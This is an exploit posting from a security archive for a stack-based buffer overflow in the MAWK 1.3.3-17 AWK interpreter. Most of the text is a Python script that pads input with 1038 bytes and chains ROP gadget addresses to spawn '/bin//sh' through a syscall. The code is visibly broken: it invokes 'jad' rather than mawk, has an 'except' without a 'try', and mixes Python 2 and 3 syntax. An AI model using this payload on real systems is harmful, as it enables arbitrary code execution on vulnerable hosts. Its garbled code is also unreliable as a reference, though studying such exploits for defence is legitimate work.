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MAWK 1.3.3-17 Buffer Overflow

MAWK 1.3.3-17 Buffer Overflow
Posted Jul 24, 2017
Authored by Juan Sacco

MAWK versions 1.3.3-17 and below are susceptible to a stack-based buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | 8ae22f24c6687d7f34733d9e6e83cb7ac1404a6bfaedd4166e57d39f5962fe1d

MAWK 1.3.3-17 Buffer Overflow

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# Developed using Exploit Pack - http://exploitpack.com -
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team -
# Tested on: GNU/Linux - Kali 2017.1 Release
# Description: MAWK ( AWK Interpreter ) 1.3.3-17 and prior is prone to
a stack-based buffer overflow
# vulnerability because the application fails to perform adequate
boundary-checks on user-supplied input.
# Program affected: mawk is an interpreter for the AWK Programming
Language. The AWK language is useful
# for manipulation of data files, text retrieval and processing, and
for prototyping and experimenting with algorithms.
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
import os, subprocess
from struct import pack

ropchain = "A"*1038 # junk
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe0) # @ .data
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x0807b744) # pop eax ; ret
ropchain += '/bin'
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
ebx ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe4) # @ .data + 4
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x0807b744) # pop eax ; ret
ropchain += '//sh'
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
ebx ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe8) # @ .data + 8
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop
ebx ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
ropchain += pack('<I', 0x0811abe0) # @ .data
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x08067b43) # pop ecx ; ret
ropchain += pack('<I', 0x0811abe8) # @ .data + 8
ropchain += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop
edi ; pop ebp ; ret
ropchain += pack('<I', 0x0811abe8) # @ .data + 8
ropchain += pack('<I', 0x0811abe0) # padding without overwrite ebx
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x41414141) # padding
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080e571f) # inc eax ; ret
ropchain += pack('<I', 0x080c861f) # int 0x80

print("[*] MAWK 1.3.3 Stack-Based Buffer Overflow by Juan Sacco")
print("[*] Please wait.. running")
subprocess.call(["jad", ropchain])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "MAWK not found!"
print "Error executing exploit"
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